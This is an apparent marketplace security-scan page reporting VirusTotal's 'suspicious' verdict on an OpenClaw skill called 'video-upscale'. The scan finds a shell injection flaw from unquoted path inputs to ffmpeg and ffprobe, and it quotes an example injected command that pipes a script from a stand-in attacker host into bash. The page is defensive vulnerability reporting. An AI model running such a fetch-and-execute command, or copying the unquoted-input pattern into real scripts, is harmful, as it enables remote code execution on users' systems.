Back to skill
Skillv1.4.0
VirusTotal security
AI Video Upscale · External malware reputation and Code Insight signals for this exact artifact hash.
Scanner verdict
SuspiciousApr 29, 2026, 4:13 AM
- Hash
- 0d21d2224a161cafcc264740992bf77b026b97529f6b67494df7a22506499334
- Source
- palm
- Verdict
- suspicious
- Code Insight
- Type: OpenClaw Skill Name: video-upscale Version: 1.4.0 The skill is classified as suspicious due to a critical shell injection vulnerability in `scripts/upscale_video.sh`. User-controlled inputs like `INPUT_PATH` and `OUTPUT_PATH` are directly used in `ffprobe` and `ffmpeg` commands without proper sanitization or quoting, allowing for arbitrary command execution (RCE). For example, a malicious `filepath` could execute `curl http://evil.com/payload.sh | bash`. The `SKILL.md` defines the interface that passes these potentially untrusted inputs to the script. Additionally, the script allows overriding paths to external tools via environment variables, which could be abused in a compromised environment.
- External report
- View on VirusTotal